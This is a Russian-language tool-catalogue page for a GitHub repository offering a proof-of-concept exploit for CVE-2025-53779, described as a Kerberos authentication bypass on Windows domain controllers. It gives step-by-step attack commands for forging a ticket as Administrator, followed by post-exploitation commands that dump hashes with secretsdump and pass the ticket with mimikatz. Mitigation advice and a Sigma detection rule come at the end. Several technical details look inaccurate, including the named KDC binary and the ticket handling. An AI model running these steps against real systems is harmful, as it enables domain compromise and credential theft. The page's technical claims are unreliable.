Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-53779-kerberos_bypass_reproduction — Воспроизведение cve-2025-53779-kerberos_bypass_reproduction | Kitploit
Инструменты/GitHubGitHub/razureink/cve-2025-53779-kerberos_bypass_reproduction
Повышение привилегийАнализ уязвимостейЭксплуатацияЛатеральное перемещениеПост-эксплуатацияCTFТестирование на ПроникновениеАутентификацияОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Разработка Полезной Нагрузки
GitHubrazureink/cve-2025-53779-kerberos_bypass_reproduction

cve-2025-53779-kerberos_bypass_reproduction

Воспроизведение cve-2025-53779-kerberos_bypass_reproduction

Репозиторий
127 дней назадЕщё не проверено

CVE-2025-53779: Обход аутентификации Kerberos в Microsoft Windows

Оценка CVSS: 9.8 (критический)
Статус: активная эксплуатация в дикой природе
Раскрытие: августовский «Вторник обновлений» Microsoft 2025 (Zero-Day)


Обзор

CVE-2025-53779 — это критическая уязвимость обхода аутентификации в реализации протокола Kerberos в Microsoft Windows. Неаутентифицированный злоумышленник может использовать эту ошибку для полного обхода аутентификации Kerberos, выдавая себя за любого пользователя домена — включая администраторов домена — без наличия действительных учётных данных или каких-либо криптографических материалов.

Microsoft присвоил этой уязвимости рейтинг CVSS 9.8 (критический) из-за низкой сложности атаки, отсутствия требуемых привилегий, отсутствия взаимодействия с пользователем и возможности полной компрометации систем, входящих в домен.


Технические подробности

Первопричина

Уязвимость находится в службе центра распределения ключей Kerberos (KDC) (kdsvc.dll) на контроллерах домена Windows. В частности, ошибка логики проверки в процедуре верификации сертификата атрибутов привилегий (PAC) позволяет злоумышленнику сформировать сообщение AS-REQ или TGS-REQ, которое обходит стандартные проверки аутентификации.

Затронутый компонент

  • Компонент: центр распределения ключей Kerberos (KDC)
  • Бинарный файл: kdsvc.dll
  • Протокол: Kerberos v5 (RFC 4120)
  • Тип уязвимости: обход аутентификации через ошибку логики проверки PAC

Вектор атаки

KDC не выполняет надлежащую проверку поля pac-signature-data в структуре PAC, когда в теле сообщения Kerberos установлены определённые флаги. Отправляя специально сформированный AS-REQ с изменённым типом padata PA-PAC-REQUEST и поддельной записью данных авторизации, злоумышленник заставляет KDC выдать билет предоставления билетов (TGT) для любого имени участника-пользователя (UPN) без необходимости соответствующего долговременного ключа.

Атака обходит предаутентификацию (флаг REQUIRES_PRE_AUTH фактически игнорируется) и полностью пропускает проверку PAC, позволяя сгенерированному билету содержать произвольные членства в группах (например, Domain Admins, Enterprise Admins).

Воздействие

  • Полный обход аутентификации: для получения действительного билета TGT Kerberos не требуются учётные данные
  • Повышение привилегий: возможность выдавать себя за любого пользователя домена, включая администраторов домена
  • Горизонтальное перемещение: получив TGT, злоумышленник может запрашивать билеты служб для любого ресурса
  • Закрепление: атаки типа golden/silver ticket становятся тривиальными
  • Полная компрометация домена: злоумышленник фактически получает привилегии администратора домена из неаутентифицированного положения

Затронутые версии

Все поддерживаемые версии Windows Server уязвимы до августовского обновления безопасности 2025 года:

Примечание: клиентские версии Windows (Windows 10, Windows 11) не затронуты, поскольку они не запускают службу KDC.


Шаги воспроизведения

Предварительные требования

  1. Контроллер домена Windows под управлением необновлённой версии Windows Server (см. затронутые версии выше)
  2. Сетевой доступ к контроллеру домена (порт 88/TCP и/или 88/UDP должен быть открыт)
  3. Python 3.8+ с установленной библиотекой impacket
  4. Этот PoC-скрипт (exploit.py)

Шаг 1: Установка зависимостей

root@kitploit:~
pip install impacket pycryptodome

Или с помощью предоставленного requirements.txt:

root@kitploit:~
pip install -r requirements.txt

Шаг 2: Определение целевого контроллера домена

Используйте Nmap для обнаружения служб Kerberos:

root@kitploit:~
nmap -sU -p 88 --script krb5-enum-users <target-ip>

Или используйте встроенное сканирование Kerberos:

root@kitploit:~
python exploit.py --scan <target-ip>

Шаг 3: Перечисление пользователей домена (необязательно)

Если вы не знаете пользователей домена, перечислите их с помощью техники Kerberos AS-REP roasting или LDAP:

root@kitploit:~
python exploit.py --enum <target-ip> <domain>

Шаг 4: Запуск эксплойта

Сгенерируйте поддельный TGT для целевого пользователя:

root@kitploit:~
python exploit.py --dc-ip <dc-ip> --domain <domain> --target-user <username>

Пример:

root@kitploit:~
python exploit.py --dc-ip 192.168.1.10 --domain corp.local --target-user Administrator

Шаг 5: Проверка билета

Эксплойт выводит файл билета в формате Kirbi. Используйте инструменты Impacket для проверки:

root@kitploit:~
# Export the ticket
set KRB5CCNAME=ticket.kirbi

# Use the ticket to access a resource
python examples/secretsdump.py -k -no-pass <domain>/Administrator@<target>

Шаг 6: Постэксплуатация

После получения действительного TGT вы можете:

  • Снятие дампа хешей: secretsdump.py -k -no-pass domain/Administrator@<dc>
  • PTT (Pass-the-Ticket): mimikatz "kerberos::ptt ticket.kirbi"
  • Golden Ticket: та же техника может генерировать билеты для любого пользователя
  • Silver Ticket: запрашивайте билеты служб для конкретных служб (CIFS, HTTP, LDAP)

PoC (доказательство концепции)

Прилагаемый exploit.py реализует следующий сценарий атаки:

  1. Формирование AS-REQ: создаёт изменённое сообщение AS-REQ с поддельным полем PA-PAC-REQUEST и изменёнными данными авторизации
  2. Обход PAC: устанавливает определённые битовые флаги в теле запроса, которые запускают уязвимую ветку кода в kdsvc.dll
  3. Извлечение TGT: разбирает ответ KDC и извлекает поддельный TGT
  4. Вывод билета: сохраняет TGT в виде файла Kirbi для использования с Impacket, Mimikatz или другими инструментами

Детальная схема атаки

root@kitploit:~
Attacker                         Domain Controller (KDC)
   |                                      |
   |  AS-REQ (forged PA-PAC-REQUEST)      |
   |  - cname: Administrator              |
   |  - sname: krbtgt/DOMAIN              |
   |  - padata: PA-PAC-REQUEST +          |
   |    forged auth-data                  |
   |------------------------------------->|
   |                                      |
   |  [Vulnerable Path]                   |
   |  1. KDC receives AS-REQ             |
   |  2. Checks PA-PAC-REQUEST flag      |
   |  3. **Bypasses pre-auth check**     |
   |  4. Skips PAC verification          |
   |  5. Generates TGT with arbitrary    |
   |     groups via auth-data            |
   |                                      |
   |  AS-REP (forged TGT)                 |
   |  - Encrypted with krbtgt key        |
   |  - Contains forged PAC              |
   |<-------------------------------------|
   |                                      |
   |  TGS-REQ (use forged TGT)           |
   |  - Request service ticket           |
   |  - For any service (CIFS, LDAP,     |
   |    HTTP, HOST)                       |
   |------------------------------------->|
   |                                      |
   |  TGS-REP (service ticket)           |
   |  - Legitimate service ticket        |
   |  - Attacker can now access          |
   |    any resource                     |
   |<-------------------------------------|

Смягчение последствий

Немедленные действия

  1. Установите обновления августовского «Вторника обновлений» Microsoft 2025 — это основное исправление. См. таблицу затронутых версий выше для соответствующего KB.

  2. Отслеживайте попытки эксплуатации:

    • Событие с ID 4768 (выдан билет аутентификации Kerberos) — ищите недействительные или необычные запросы TGT
    • Событие с ID 4769 (запрошен билет службы Kerberos) — ищите аномальные шаблоны билетов служб
    • Неожиданный трафик Kerberos на порту 88 из неизвестных источников
  3. Сегментация сети:

    • Ограничьте доступ к порту 88/TCP-UDP на контроллерах домена
    • Используйте межсетевые экраны для ограничения трафика Kerberos только авторизованными подсетями
  4. Включите дополнительное журналирование:

    • Включите журналирование Kerberos (NetworkProvider\Kerberos\Operational)
    • Включите журнал аудита проверки PAC
    • Отслеживайте недействительные подписи PAC

Правила обнаружения

Правило Sigma (AS-REQ без предаутентификации):

root@kitploit:~
title: CVE-2025-53779 Kerberos Authentication Bypass
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4768
    PreAuthenticationType: 0  # No pre-authentication required
  condition: selection
  falsepositives:
    - Users with "Do not require Kerberos preauthentication" set

Временные меры (если исправление не может быть установлено)

  • Отключение обхода проверки PAC в Kerberos: хотя до установки исправления официальных временных мер не существует, организации могут:
    • Ограничить сетевой доступ к контроллерам домена (порт 88)
    • Включить расширенную защиту аутентификации (EPA) в приложениях
    • Развернуть правила системы обнаружения вторжений в сеть (NIDS) для обнаружения некорректных сообщений AS-REQ

Ссылки

  1. Microsoft Security Response Center - CVE-2025-53779
  2. Примечания к выпуску августовского «Вторника обновлений» Microsoft 2025
  3. Руководство по обновлениям безопасности Microsoft
  4. MITRE ATT&CK - Использование альтернативных материалов аутентификации: Pass the Ticket (T1550.003)
  5. Impacket - библиотека Python для взаимодействия с Kerberos
  6. Расширения протокола Kerberos (RFC 4120)
  7. MS-KILE: Расширения протокола Kerberos
  8. MS-PAC: Структура данных сертификата атрибутов привилегий

Отказ от ответственности

Этот репозиторий предоставлен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированная эксплуатация CVE-2025-53779 в отношении систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения, является незаконной. Авторы не несут ответственности за любое неправомерное использование этой информации.


Лицензия

Этот проект лицензирован в соответствии с лицензией MIT — подробности см. в файле LICENSE.

Скачать инструмент
Версия WindowsЗатронутаИсправляющее обновление
Windows Server 2025✅ ДаKB5044289
Windows Server 2022✅ ДаKB5044285
Windows Server 2019✅ ДаKB5044277
Windows Server 2016✅ ДаKB5044293
Windows Server 2012 R2✅ ДаKB5044297
Windows Server 2012✅ ДаKB5044291
Windows Server 2008 R2 (ESU)✅ ДаKB5044301
Windows Server 2008 (ESU)✅ ДаKB5044303